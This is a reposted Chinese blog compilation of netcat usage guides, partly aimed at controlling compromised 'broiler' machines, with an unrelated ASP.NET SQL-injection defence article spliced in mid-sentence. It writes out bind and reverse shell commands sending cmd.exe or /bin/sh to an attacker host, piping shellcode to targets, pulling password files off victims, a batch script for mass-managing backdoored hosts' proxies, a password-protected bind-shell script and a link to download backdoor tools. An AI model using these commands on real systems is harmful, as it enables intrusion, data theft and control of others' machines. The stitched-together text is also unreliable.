nc使用說明,網路轉載資料。

參數介紹:
nc.exe -h即可看到各參數的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]

-d 後台模式
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站連接
-L 連接關閉後,仍然繼續監聽
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 隨機本地及遠程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 詳細輸出--用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉--用於掃瞄時

端口的表示方法可寫為M-N的範圍格式。


===========================================================================================
基本用法:

大概有以下幾種用法:

1)連接到REMOTE主機,例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的TCP80端口


2)監聽LOCAL主機,例子:
格式:nc -l -p 80
講解:監聽本機的TCP80端口


3)掃瞄遠程主機,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃瞄192.168.x.x的TCP80到TCP445的所有端口


4)REMOTE主機綁定SHELL,例子:
格式:nc -l -p 5354 -t -e c:winntsystem32cmd.exe
講解:綁定REMOTE主機的CMDSHELL在REMOTE主機的TCP5354端口


5)REMOTE主機綁定SHELL並反向連接,例子:
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
講解:綁定REMOTE主機的CMDSHELL並反向連接到192.168.x.x的TCP5354端口


以上為最基本的幾種用法(其實NC的用法還有很多,
當配合管道命令「|」與重定向命令「<」、「>」等等命令功能更強大......)。

===========================================================================================
高級用法:

6)作攻擊程序用,例子:
格式1:type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:exploit.txt
講解:連接到192.168.x.x的80端口,並在其管道中發送c:exploit.txt的內容(兩種格式確有相同的效果,
真是有異曲同工之妙:P)

附:c:exploit.txt為shellcode等


7)作蜜罐用[1],例子:
格式:nc -L -p 80
講解:使用-L(注意L是大寫)可以不停地監聽某一個端口,直到ctrl+c為止


8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:log.txt
講解:使用-L可以不停地監聽某一個端口,直到ctrl+c為止,同時把結果輸出到c:log.txt中,如果把『>』
改為『>>』即可以追加日誌

附:c:log.txt為日誌等


9)作蜜罐用[3],例子:

格式1:nc -L -p 80 < c:honeypot.txt

格式2:type.exe c:honeypot.txt|nc -L -p 80

講解:使用-L可以不停地監聽某一個端口,直到ctrl+c為止,並把c:honeypot.txt的內容『送』入其管道中如果攻擊者知道應用會將表單中輸入的內容直接用於驗證身份的查詢,他就會嘗
試輸入某些特殊的SQL字符串篡改查詢改變其原來的功能,欺騙系統授予訪問權限。

系統環境不同,攻擊者可能造成的損害也不同,這主要由應用訪問數據庫的安全權限決定。如果用戶的帳戶具有管理員或其他比較高級的權限,攻擊者就可能對數據庫的表執行各種他想要
做的操作,包括添加、刪除或更新數據,甚至可能直接刪除表。

二、如何防範?
好在要防止ASP.NET應用被SQL注入式攻擊闖入並不是一件特別困難的事情,只要在利用表單輸入的內容構造SQL命令之前,把所有輸入內容過濾一番就可以了。過濾輸入內容可以按多種方式
進行。

⑴ 對於動態構造SQL查詢的場合,可以使用下面的技術:

第一:替換單引號,即把所有單獨出現的單引號改成兩個單引號,防止攻擊者修改SQL命令的含義。再來看前面的例子,「Select * from Users Where login = or 1=1 AND password = or
1=1」顯然會得到與「Select * from Users Where login = or 1=1 AND password = or 1=1」不同的結果。

第二:刪除用戶輸入內容中的所有連字符,防止攻擊者構造出類如「Select * from Users Where login = mas -- AND password =」之類的查詢,因為這類查詢的後半部分已經被註釋掉,
不再有效,攻擊者只要知道一個合法的用戶登錄名稱,根本不需要知道用戶的密碼就可以順利獲得訪問權限。

第三:對於用來執行查詢的數據庫帳戶,限制其權限。用不同的用戶帳戶執行查詢、插入、更新、刪除操作。由於隔離了不同帳戶可執行的操作,因而也就防止了原本用於執行Select命令
的地方卻被用於執行Insert、Update或Delete命令。

⑵ 用存儲過程來執行所有的查詢。SQL參數的傳遞方式將防止攻擊者利用單引號和連字符實施攻擊。此外,它還使得數據庫權限可以限制到只允許特定的存儲過程執行,所有的用戶輸入必須
遵從被調用的存儲過程的安全上下文,這樣就很難再發生注入式攻擊了。

⑶ 限制表單或查詢字符串輸入的長度。如果用戶的登錄名字最多只有10個字符,那麼不要認可表單中輸入的10個以上的字符,這將大大增加攻擊者在SQL命令中插入有害代碼的難度。

⑷ 檢查用戶輸入的合法性,確信輸入的內容只包含合法的數據。數據檢查應當在客戶端和服務器端都執行——之所以要執行服務器端驗證,是為了彌補客戶端驗證機制脆弱的安全性。

在客戶端,攻擊者完全有可能獲得網頁的源代碼,修改驗證合法性的腳本(或者直接刪除腳本),然後將非法內容通過修改後的表單提交給服務器。因此,要保證驗證操作確實已經執行,
唯一的辦法就是在服務器端也執行驗證。你可以使用許多內建的驗證對象,例如 RegularExpressionValidator,它們能夠自動生成驗證用的客戶端腳本,當然你也可以插入服務器端的方法
調用。如果找不到現成的驗證對象,你可以通過CustomValidator自己創建一個。

⑸ 將用戶登錄名稱、密碼等數據加密保存。加密用戶輸入的數據,然後再將它與數據庫中保存的數據比較,這相當於對用戶輸入的數據進行了「消毒」處理,用戶輸入的數據不再對數據庫
有任何特殊的意義,從而也就防止了攻擊者注入SQL命令。 System.Web.Security.formsAuthentication類有一個 HashPasswordForStoringInConfigFile,非常適合於對輸入數據進行消毒
處理。

⑹ 檢查提取數據的查詢所返回的記錄數量。如果程序只要求返回一個記錄,但實際返回的記錄卻超過一行,那就當作出錯處理。

參數解釋:
-e 程序重定向
-t 用telnet來回應
-l 監聽本地端口
-p 指定本地端口
-v 獲得端口信息
-vv 獲得詳細的端口信息
-z 關閉輸入輸出
-n 指定IP地址
-w 設定超時時間
-u UDP端口

我就知道這麼些參數 了

第一個:
nc -l -v -p 7626
這就是打開本地的7626端口進行監聽,並反饋連接信息這樣如果有掃瞄冰河木馬的人會認為你中了木馬開放了7626,和「小豬快跑」的功能有點象,再加個批處理文件一起用的話就是一個
「小豬快跑」了

如果要監視是否有入侵本地80端口的行為,並記下來,用這個命令:
nc -l -p 80 >>c:\\日誌.dat
這樣,凡是有針對本機80端口的攻擊都會被記錄下來的


二、
如果你通過溢出進入了別人的機器,就可以運行:
nc -l -p 123 -e cmd.exe
或者是: nc -l -p 123 -t
作用都是以cmd.exe來響應到機器上123端口的連接
這樣就把溢出的主機變成了一台telnet肉雞了啊
你也可一用命令讓肉雞主動連接你的主機,假設我的IP是192.168.0.1
在肉雞上運行: nc -e cmd.exe 192.168.0.1 777
再在本地機器上運行: nc -l -p 777
意思是讓肉雞將cmd.exe(就是個shell)主動響應到你電腦的777端口
你再在本地機上監聽777端口,這樣就進入了對方的cmd了
這也微十時毫 反彈端口式木馬的原理了。


三、
用這個命令:
nc -v 192.168.0.25 80
就獲得了192.168.0.25的80端口的信息
可以獲得IIS版本等很多重要信息 的

四、
你也可以將NC作為掃瞄器使用:
nc -v -z 192.168.0.25 1-100
掃瞄192.168.0.25的1到100間的TCP端口

用nc -v -z -u 192.168.0.25 1-100
這是掃瞄1到00間的UDP端口

 

[/td][/tr][tr][td] [/td][/tr][/table]
[/table]
 

[table=98%]

[table=98%][tr][td]第[1]樓[/td][/tr][tr][td]文章結構:

  0. 寫在前面的話
  1. Netcat 1.10 for NT - nc11nt.zip,原始英文信息
  2. Netcat 1.10 for NT 幫助信息
  3. Netcat 1.10 常用的命令格式
  4. 管理肉雞,更改肉雞設置
  5. 下載連接
  6. 後記

########################################
0. 寫在前面的話
########################################

  最近工作比較空閒,老是想著怎麼自動telnet肉雞,自動執行命令。來管理自己的肉雞。自己寫一個程序。功底是不夠的,所以只有看了看nc的幫助信息,雖然只看了個半懂,但是借助於
金山詞霸2002版本, 還是明白了一點東西.

  我覺的有必要再總結一下.反正主要是滿足我自己的需要.


########################################
1. Netcat 1.10 for NT - nc11nt.zip
########################################

Basic Features

* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomizer
* Can read command line arguments from standard inputb
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Ability to let another program service established
connections
* Telnet-options responder

New for NT

* Ability to run in the background without a console window
* Ability to restart as a single-threaded server to handle a new
connection
_________________________________________________________________________
Some of the features of netcat are:

Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomizer
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Optional ability to let another program service inbound connections

Some of the potential uses of netcat:

Script backends
Scanning ports and inventorying services
Backup handlers
File transfers
Server testing and simulation
Firewall testing
Proxy gatewaying
Network performance testing
Address spoofing tests
Protecting X servers
1001 other uses you`ll likely come up with

Netcat + Encryption = Cryptcat


  對比win2000微軟的telnet.exe和微軟的tlntsvr.exe服務,連接的時候就可以看出來了.1.1 NC.EXE是一個非標準的telnet客戶端程序,1.2 還有一個putty.exe客戶端程序,提供四種連接
模式
-raw -telnet -rlogin -ssh.


########################################
2. Netcat 1.10 for NT 幫助信息
########################################

C:\WINDOWS\Desktop>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode (後台模式)
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft (本幫助信息)
-i secs delay interval for lines sent, ports scanned (延遲時間)
-l listen mode, for inbound connects (監聽模式,等待連接)
-L listen harder, re-listen on socket close (連接關閉後,仍然繼續監聽)
-n numeric-only IP addresses, no DNS (ip數字模式,非dns解析)
-o file hex dump of traffic (十六進制模式輸出文件,三段)
-p port local port number (本地端口)
-r randomize local and remote ports (隨機本地遠程端口)
-s addr local source address (本地源地址)
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose] (-vv 更多信息)
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning] (掃瞄模式,-vv)
port numbers can be individual or ranges: m-n [inclusive]


########################################
3. Netcat 1.10 常用的命令格式
########################################

  下面引用 《沉睡不醒 10月15日凌晨》的文章的部分。

3.1.端口的刺探:

nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open //顯示是否開放open


3.2.掃瞄器

nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port

  這樣掃瞄會留下大量的痕跡,系統管理員會額外小心。

3.3. 後門

victim machine: //受害者的機器
nc -l -p port -e cmd.exe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻擊者的機器.
nc ip -p port //連接victim_IP,然後得到一個shell。


3.4.反向連接
attacker machine: //一般是sql2.exe,遠程溢出,webdavx3.exe攻擊.
//或者wollf的反向連接.
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port

或者:

attacker machine:
nc -vv -l -p port1 /*用於輸入*/
nc -vv -l -p prot2 /*用於顯示*/
victim machine:
nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
nc attacker_ip port1 | /bin/sh | nc attacker_ip port2


  139要加參數-s(nc.exe -L -p 139 -d -e cmd.exe -s 對方機器IP),這樣就可以保證nc.exe優先於NETBIOS。

3.5.傳送文件:

3.5.1 attacker machine <-- victim machine //從肉雞拖密碼文件回來.
nc -d -l -p port < path\filedest     /*attacker machine*/ 可以shell執行
nc -vv attacker_ip port > path\file.txt /*victim machine*/ 需要Ctrl+C退出
//肉雞需要gui界面的cmd.exe裡面執行(終端登陸,不如安裝FTP方便).否則沒有辦法輸入Crl+C.

3.5.2 attacker machine --> victim machine //上傳命令文件到肉雞
nc -vv -l -p port > path\file.txt      /*victim machine*/ 需要Ctrl+C退出
nc -d victim_ip port < path\filedest   /*attacker machine*/ 可以shell執行
//這樣比較好.我們登陸終端.入侵其他的肉雞.可以選擇shell模式登陸.


  結論: 可以傳輸ascii,bin文件.可以傳輸程序文件.

  問題:連接某個ip後,傳送完成後,需要發送Ctrl+C退出nc.exe .或者只有再次連接使用pskill.exe 殺掉進程.但是是否釋放傳輸文件打開的句柄了?

3.6 端口數據抓包.

nc -vv -w 2 -o test.txt xfocus.net 80 21-15

< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
< 00000084 83 00 00 01 8f # .....


3.7 telnet,自動批處理。 ★★★★★我要重點推薦的東西就是這個.

nc victim_ip port < path\file.cmd   /*victim machine*/ 顯示執行過程.
nc -vv victim_ip port < path\file.cmd   /*victim machine*/ 顯示執行過程.

nc -d victim_ip port < path\file.cmd 安靜模式.

_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
_______________file.cmd__END___________________


########################################
4. 管理肉雞,更改肉雞設置
########################################

4.1 比如要統一更改肉雞上面的代理端口.snake.exe 修改為11111 服務名稱"sksockserver",使用winshell後門. 端口1234 密碼password

命令格式就是:

modi.bat youip.txt

___________modi.bat____________________________
@if "%1"=="" echo Error: no ip.txt &&goto END

:start
@echo password >a.cmd
@echo s >>a.cmd
@echo cd /d %%windir%%\system32\ >>a.cmd
@net stop "sksockserver" >>a.cmd
@snake.exe -config port 11111 >>a.cmd
@net start "sksockserver" >>a.cmd
@exit >>a.cmd

:auto
@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)

:END
___________modi.bat__END_______________________


4.2
@echo off
color f0
:start
cls
C:\nc -vv -w 3 -l -p 80>>80.txt
goto start


  把防火牆關掉以後運行這個批處理,會監聽到許多探測U漏洞的信息,大多是三條一組--妮姆達病毒掃瞄你的。這樣就會得到肉雞的.雖然質量不高.但是也是一種便宜的辦法.

  肉雞特徵:

  1。unicode漏洞
  2。guest密碼為空,administrators組用戶
  3。其他漏洞

  自己慢慢的爽去吧。不過,再次強調一句,不建議而且是不能破壞國內主機,上去以後將tftp.exe改名。然後用pskill幹掉mmc.exe進程,之後是殺毒。做好後門以後,將guest帳號停
用,以對付傻瓜掃瞄器


########################################
5. 下載連接
########################################

http://www.coolersky.com/Download/Hacker/Back-door/nc.rar


########################################
6. 補充
########################################

以下為NetCat的Unix版本使用方法(轉載):
http://www.xfocus.net/articles/200103/88.html

--------------------------------------
nc使用技巧

by quack

http://www.xfocus.org ;安全焦點

  nc這個小玩意兒應該大家耳熟能詳,也用了N年了吧……這裡不多講廢話,結合一些script說說它的使用技巧。


(文中所舉的script都來自於nc110.tgz的文件包)


一、基本使用:

Quack# nc -h
[v1.10]
  想要連接到某處: nc [-options] hostname port[s] [ports] ...
  綁定端口等待連接:   nc -l -p port [-options] [hostname] [port]
  參數:
    -e prog         程序重定向,一旦連接,就執行 [危險!!]
    -g gateway       source-routing hop point[s], up to 8
    -G num         source-routing pointer: 4, 8, 12, ...
    -h           幫助信息
    -i secs         延時的間隔
    -l           監聽模式,用於入站連接
    -n           指定數字的IP地址,不能用hostname
    -o file         記錄16進制的傳輸
    -p port         本地端口號
    -r           任意指定本地及遠程端口
    -s addr         本地源地址
    -u           UDP模式
    -v           詳細輸出——用兩個-v可得到更詳細的內容
    -w secs         timeout的時間
    -z           將輸入輸出關掉——用於掃瞄時


  其中端口號可以指定一個或者用lo-hi式的指定範圍。


二、用於傳輸文件——ncp

#! /bin/sh
## 類似於rcp,但是是用netcat在高端口做的
## 在接收文件的機器上做"ncp targetfile"
## 在發送文件的機器上做"ncp sourcefile receivinghost"
## 如果調用了 "nzp" ,會將傳輸文件壓縮

## 這裡定義你想使用的端口,可以自由選擇
MYPORT=23456

## 如果nc沒有在系統路徑中的話,要把下面一行註釋去掉,加以修改
# PATH=$:$ ; export PATH

## 下面這幾行檢查參數輸入情況:

test "$3" && echo "too many args" && exit 1
test ! "$1" && echo "no args?" && exit 1
me=`echo $0 | sed s+.*/++`
test "$me" = "nzp" && echo [compressed mode]

# if second arg, its a host to send an [extant] file to.
if test "$2" ; then
test ! -f "$1" && echo "cant find $1" && exit 1
if test "$me" = "nzp" ; then
  compress -c < "$1" | nc -v -w 2 $2 $MYPORT && exit 0
else
  nc -v -w 2 $2 $MYPORT < "$1" && exit 0
fi
echo "transfer FAILED!"
exit 1
fi

# 是否在接收文件機器當前目錄有同名文件

if test -f "$1" ; then
echo -n "Overwrite $1? "
read aa
test ! "$aa" = "y" && echo "[punted!]" && exit 1
fi
# 30 seconds oughta be pleeeeenty of time, but change if you want.
if test "$me" = "nzp" ; then
# 注意這裡nc的用法,結合了重定向符號和管道
nc -v -w 30 -p $MYPORT -l < /dev/null | uncompress -c > "$1" && exit 0
else
nc -v -w 30 -p $MYPORT -l < /dev/null > "$1" && exit 0
fi
echo "transfer FAILED!"
# clean up, since even if the transfer failed, $1 is already trashed
rm -f "$1"
exit 1

這樣的話,我只要在A機器上先 QuackA# ncp ../abcd
listening on 然後在另一台機器B上
QuackB#ncp abcd 192.168.0.2
quackb [192.168.0.1] 23456 (?)
A機上出現
open connect to [192.168.0.2] from quackb [192.168.0.1] 1027
#

  查看一下,文件傳輸完畢。


三、用於綁定端口——bsh

  首先要清楚,如果你編譯netcat時僅用如make freebsd之類的命令來編譯的話,這個工具是無法利用的——要define一個GAPING_SECURITY_HOLE它才會提供-e選項。

#! /bin/sh
## 一個利用nc的綁定shell並且帶有密碼保護的腳本
## 帶有一個參數,即端口號

NC=nc

case "$1" in
?* )
LPN="$1"
export LPN
sleep 1
#注意這裡nc的用法,參數-l是lister,-e是執行重定向
echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 &
echo "launched on port $LPN"
exit 0
;;
esac

# here we play inetd
echo "-l -p $LPN -e $0" ; $NC -l -p $LPN -e $0 > /dev/null 2>&1 &

while read qq ; do
case "$qq" in
# 這裡就是弱密碼保護了,密碼是quack
quack )
cd /
exec csh -i
;;
esac
done

要看看它是怎麼使用的麼?

quack# ./bsh 6666 <-------輸入,後面是程序輸出
-l -p 6666 -e ./bsh
launched on port 6666
quack#
quack## nc localhost 6666 <----------輸入
-l -p 6666 -e ./bsh
quack  <----------輸入,密碼驗證
Warning: imported path contains relative components
Warning: no access to tty (Bad file descriptor).
Thus no job control in this shell.
Cracker#


四、 用於端口掃瞄——probe

  在我們常見的一些端口掃瞄程序中,如Vetescan這類以shell script寫成的話,很多都需要系統中裝有netcat,原因何在呢?看看下面的script,你或許會明白一些。

#! /bin/sh
## launch a whole buncha shit at yon victim in no particular order; capture
## stderr+stdout in one place. Run as root for rservice and low -p to work.
## Fairly thorough example of using netcat to collect a lot of host info.
## Will set off every intrusion alarm in existence on a paranoid machine!

# 該目錄裡有一些小工具
DDIR=../data
# 指定網關
GATE=192.157.69.11

# might conceivably wanna change this for different run styles
UCMD=nc -v -w 8

test ! "$1" && echo Needs victim arg && exit 1

echo | $UCMD -w 9 -r "$1" 13 79 6667 2>&1
echo 0 | $UCMD "$1" 79 2>&1
# if LSRR was passed thru, should get refusal here:
# 要注意這裡的用法,其實nc的這些參數掌握好可以做很多事情
$UCMD -z -r -g $GATE "$1" 6473 2>&1
$UCMD -r -z "$1" 6000 4000-4004 111 53 2105 137-140 1-20 540-550 95 87 2>&1
# -s `hostname` may be wrong for some multihomed machines
echo UDP echoecho! | nc -u -p 7 -s `hostname` -w 3 "$1" 7 19 2>&1
echo 113,10158 | $UCMD -p 10158 "$1" 113 2>&1
rservice bin bin | $UCMD -p 1019 "$1" shell 2>&1
echo QUIT | $UCMD -w 8 -r "$1" 25 158 159 119 110 109 1109 142-144 220 23 2>&1
# newline after any telnet trash
echo
echo PASV | $UCMD -r "$1" 21 2>&1
echo GET / | $UCMD -w 10 "$1" 80 81 210 70 2>&1
# sometimes contains useful directory info:
# 知道robots.txt是什麼文件麼?;)
echo GET /robots.txt | $UCMD -w 10 "$1" 80 2>&1
# now the big red lights go on
# 利用小工具rservice來嘗試,該工具可以在nc110.tgz的data目錄裡找到
rservice bin bin 9600/9600 | $UCMD -p 1020 "$1" login 2>&1
rservice root root | $UCMD -r "$1" exec 2>&1
echo BEGIN big udp -- everything may look "open" if packet-filtered
data -g < $/nfs-0.d | $UCMD -i 1 -u "$1" 2049 | od -x 2>&1
# no wait-time, uses RTT hack
nc -v -z -u -r "$1" 111 66-70 88 53 87 161-164 121-123 213 49 2>&1
nc -v -z -u -r "$1" 137-140 694-712 747-770 175-180 2103 510-530 2>&1
echo END big udp
$UCMD -r -z "$1" 175-180 2000-2003 530-533 1524 1525 666 213 8000 6250 2>&1
# Use our identd-sniffer!
iscan&q

flyfox 發表在 痞客邦 PIXNET 留言(0) 人氣()